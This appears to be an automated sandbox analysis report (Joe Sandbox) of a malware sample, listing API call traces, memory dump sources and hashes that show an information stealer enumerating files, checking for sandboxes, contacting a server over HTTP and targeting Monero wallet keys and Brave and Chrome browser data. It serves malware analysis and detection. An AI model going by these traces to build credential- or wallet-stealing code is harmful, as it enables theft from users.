                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CrackInternetlstrlen
                        • String ID: <
                        • API String ID: 1274457161-4251816714
                        • Opcode ID: 97aa0f1818150a0ed6161408cfd828c22b38eccf9f2186646d63aa86a6400049
                        • Instruction ID: ae3aa231373a6278180ce66502f990bf22cae901cdedbad40b6a8121e727a92d
                        • Opcode Fuzzy Hash: 97aa0f1818150a0ed6161408cfd828c22b38eccf9f2186646d63aa86a6400049
                        • Instruction Fuzzy Hash: 6C216FB1D00208ABDF10DFA5E845ADE7B74FB04320F108626F919B72C0EB706A09DF81

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00C5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C5A7E6
                          • Part of subcall function 00C46280: InternetOpenA.WININET(00C60DFE,00000001,00000000,00000000,00000000), ref: 00C462E1
                          • Part of subcall function 00C46280: StrCmpCA.SHLWAPI(?,008A0610), ref: 00C46303
                          • Part of subcall function 00C46280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C46335
                          • Part of subcall function 00C46280: HttpOpenRequestA.WININET(00000000,GET,?,0089FCA0,00000000,00000000,00400100,00000000), ref: 00C46385
                          • Part of subcall function 00C46280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C463BF
                          • Part of subcall function 00C46280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C463D1
                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C55228
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                        • String ID: ERROR$ERROR
                        • API String ID: 3287882509-2579291623
                        • Opcode ID: 9270f8f20c372ad04521bfd356df4e23e2ac72a66aa8e20ea12a93de67dfdf34
                        • Instruction ID: e596a07a20c4cd3729ef4514ce99053ccfadf845086e19ab8bd8f3d1932d3bdf
                        • Opcode Fuzzy Hash: 9270f8f20c372ad04521bfd356df4e23e2ac72a66aa8e20ea12a93de67dfdf34
                        • Instruction Fuzzy Hash: 8B113334900008ABCB14FF62DD52AED7738BF50341F444264FC1A56192EF306B8DEB95
                        APIs
                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C4112B
                        • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C41132
                        • ExitProcess.KERNEL32 ref: 00C41143
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process$AllocCurrentExitNumaVirtual
                        • String ID:
                        • API String ID: 1103761159-0
                        • Opcode ID: ac56f1841f9e525ed6e708c2f09461959a7a1f723b82e66cd82ae67ba30bb342
                        • Instruction ID: 9e2b75cd9e5fd43ec0dc1c00be87748fed2fc9ddc3f0a961559cfcd924b9e213
                        • Opcode Fuzzy Hash: ac56f1841f9e525ed6e708c2f09461959a7a1f723b82e66cd82ae67ba30bb342
                        • Instruction Fuzzy Hash: 38E0E670985308FFF714ABA19C0EB0D76B8AB04B41F144056FB0D761D0D6B52644979A
                        APIs
                        • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C410B3
                        • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C410F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Virtual$AllocFree
                        • String ID:
                        • API String ID: 2087232378-0
                        • Opcode ID: c8bfc6c30166460fa2881cb69fea99287c3d6189f7232bd6931a507546842ad5
                        • Instruction ID: 61a0d72c584ef74b2274edae986f4c8fd7fab98e5e9992bf1e5c2833a577000d
                        • Opcode Fuzzy Hash: c8bfc6c30166460fa2881cb69fea99287c3d6189f7232bd6931a507546842ad5
                        • Instruction Fuzzy Hash: 89F0E271641208BBE7149AA4AC49FAAB7E8E705B15F300459F944E3280D5729F44DBA4
                        APIs
                          • Part of subcall function 00C578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C57910
                          • Part of subcall function 00C578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C57917
                          • Part of subcall function 00C578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C5792F
                          • Part of subcall function 00C57850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C411B7), ref: 00C57880
                          • Part of subcall function 00C57850: RtlAllocateHeap.NTDLL(00000000), ref: 00C57887
                          • Part of subcall function 00C57850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C5789F
                        • ExitProcess.KERNEL32 ref: 00C411C6
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$Process$AllocateName$ComputerExitUser
                        • String ID:
                        • API String ID: 3550813701-0
                        • Opcode ID: 4b880e47d243f69f8722f295ad0f5e3a051ddefa4482f382514ac5635f0b0498
                        • Instruction ID: 79359c8a7aa613dc2d0c4eb729363e43854402d7c6746f318cb321f706e03c3e
                        • Opcode Fuzzy Hash: 4b880e47d243f69f8722f295ad0f5e3a051ddefa4482f382514ac5635f0b0498
                        • Instruction Fuzzy Hash: 3EE0E6B991420157DA0073B17C06B1A325C5714346F080525BE09B2142FD15E58CA66D
                        APIs
                        • wsprintfA.USER32 ref: 00C538CC
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C538E3
                        • lstrcat.KERNEL32(?,?), ref: 00C53935
                        • StrCmpCA.SHLWAPI(?,00C60F70), ref: 00C53947
                        • StrCmpCA.SHLWAPI(?,00C60F74), ref: 00C5395D
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C53C67
                        • FindClose.KERNEL32(000000FF), ref: 00C53C7C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                        • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                        • API String ID: 1125553467-2524465048
                        • Opcode ID: 9085603c69b99c42a8ed88b90576e4a4e272ca06336a7b50248e0d445740ac9e
                        • Instruction ID: f07b6b4bab620d3e8a16db4ca75c4cfdb080d21508b9ed0662fb82a9b31e8851
                        • Opcode Fuzzy Hash: 9085603c69b99c42a8ed88b90576e4a4e272ca06336a7b50248e0d445740ac9e
                        • Instruction Fuzzy Hash: 4DA171B5A002089FDB34DFA5DC85FEA7378BB48301F084599B91DA6141EB759BC8CF62
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
                          • Part of subcall function 00C5A9B0: lstrcpy.KERNEL32(00000000), ref: 00C5AA04
                          • Part of subcall function 00C5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C5AA12
                          • Part of subcall function 00C5A8A0: lstrcpy.KERNEL32(?,00C60E17), ref: 00C5A905
                        • FindFirstFileA.KERNEL32(00000000,?,00C60B32,00C60B2B,00000000,?,?,?,00C613F4,00C60B2A), ref: 00C4BEF5
                        • StrCmpCA.SHLWAPI(?,00C613F8), ref: 00C4BF4D
                        • StrCmpCA.SHLWAPI(?,00C613FC), ref: 00C4BF63
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4C7BF
                        • FindClose.KERNEL32(000000FF), ref: 00C4C7D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 088cb3030dd25adfa84a32ccbfd30b2b173b1ac8547e5a5b5c467859b20de548
                        • Instruction ID: 973c86819cef344d90b5dbc4b533802e8af60a047b3f9e122b4163cbc3e8c0fb
                        • Opcode Fuzzy Hash: 088cb3030dd25adfa84a32ccbfd30b2b173b1ac8547e5a5b5c467859b20de548
                        • Instruction Fuzzy Hash: EB4252769101089BDB14FB71DD96EED733CAF84301F404668FD0AA6091EE349B8DDBA6
                        APIs
                        • wsprintfA.USER32 ref: 00C5492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C54943
                        • StrCmpCA.SHLWAPI(?,00C60FDC), ref: 00C54971
                        • StrCmpCA.SHLWAPI(?,00C60FE0), ref: 00C54987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C54B7D
                        • FindClose.KERNEL32(000000FF), ref: 00C54B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: beda0f18d65cb1e32b59fa564ac9f42b267cc4af551ee1e4967ca3d0caed0b74
                        • Instruction ID: 962f6553e67c005a02c12f3fba99bfd70e167750a9f78a8df80741ef10e0b9e4
                        • Opcode Fuzzy Hash: beda0f18d65cb1e32b59fa564ac9f42b267cc4af551ee1e4967ca3d0caed0b74
                        • Instruction Fuzzy Hash: 8C6176B5500218AFDB24EFA1DC89EEA737CBB48301F044599F50DA6040EB759BC9CFA5
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C54580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C54587
                        • wsprintfA.USER32 ref: 00C545A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C545BD
                        • StrCmpCA.SHLWAPI(?,00C60FC4), ref: 00C545EB
                        • StrCmpCA.SHLWAPI(?,00C60FC8), ref: 00C54601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5468B
                        • FindClose.KERNEL32(000000FF), ref: 00C546A0
                        • lstrcat.KERNEL32(?,008A0710), ref: 00C546C5
                        • lstrcat.KERNEL32(?,0089FAE8), ref: 00C546D8
                        • lstrlen.KERNEL32(?), ref: 00C546E5
                        • lstrlen.KERNEL32(?), ref: 00C546F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 9b48cc41c2e32ad73dd66c68af6179f8e4c77c838cda91402a6698b9faa1db10
                        • Instruction ID: f3977e73789979b9eb7b0eeb3e114d4ec0458a459e2a007bf6d95c087b4907ca
                        • Opcode Fuzzy Hash: 9b48cc41c2e32ad73dd66c68af6179f8e4c77c838cda91402a6698b9faa1db10
                        • Instruction Fuzzy Hash: E05185B55002189FD724EBB0DC89FEE737CAB58301F444599B60DA2090EB749BCC8FA6
                        APIs
                        • wsprintfA.USER32 ref: 00C53EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C53EDA
                        • StrCmpCA.SHLWAPI(?,00C60FAC), ref: 00C53F08
                        • StrCmpCA.SHLWAPI(?,00C60FB0), ref: 00C53F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C5406C
                        • FindClose.KERNEL32(000000FF), ref: 00C54081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: f35c997b768987f9e4d0e15c9ec1108da79ed8e51114c540d661d54dd9e4c890
                        • Instruction ID: fa03bac1e0d19658a42a64116f730e151793fa68289dfd126bc14bd90dca4455
                        • Opcode Fuzzy Hash: f35c997b768987f9e4d0e15c9ec1108da79ed8e51114c540d661d54dd9e4c890
                        • Instruction Fuzzy Hash: 9F5187B6900218AFCB24EBB1DC86EFA737CBB44301F044599B65DA2040EB759BCD8F65
                        APIs
                        • wsprintfA.USER32 ref: 00C4ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 00C4ED55
                        • StrCmpCA.SHLWAPI(?,00C61538), ref: 00C4EDAB
                        • StrCmpCA.SHLWAPI(?,00C6153C), ref: 00C4EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00C4F2AE
                        • FindClose.KERNEL32(000000FF), ref: 00C4F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 52640f104f082e27df0b8d34e4a83ffa9b6dd303dd2d7f6b28cf435d4f4f89ac
                        • Instruction ID: bfd0669abb13f40b570535b2cc5c4f3599be9b6d227316cffd0ba9a04d081311
                        • Opcode Fuzzy Hash: 52640f104f082e27df0b8d34e4a83ffa9b6dd303dd2d7f6b28cf435d4f4f89ac
                        • Instruction Fuzzy Hash: ADE1F5759111189AEB54FB62CC92EEE7338BF54301F4442A9B90A62092EF306FCEDF55
                        APIs
                          • Part of subcall function 00C5A740: lstrcpy.KERNEL32(00C60E17,00000000), ref: 00C5A788
                          • Part of subcall function 00C5A920: lstrcpy.KERNEL32(00000000,?), ref: 00C5A972
                          • Part of subcall function 00C5A920: lstrcat.KERNEL32(00000000), ref: 00C5A982
                          • Part of subcall function 00C5A9B0: lstrlen.KERNEL32(?,0089AEE8,?,\Monero\wallet.keys,00C60E17), ref: 00C5A9C5
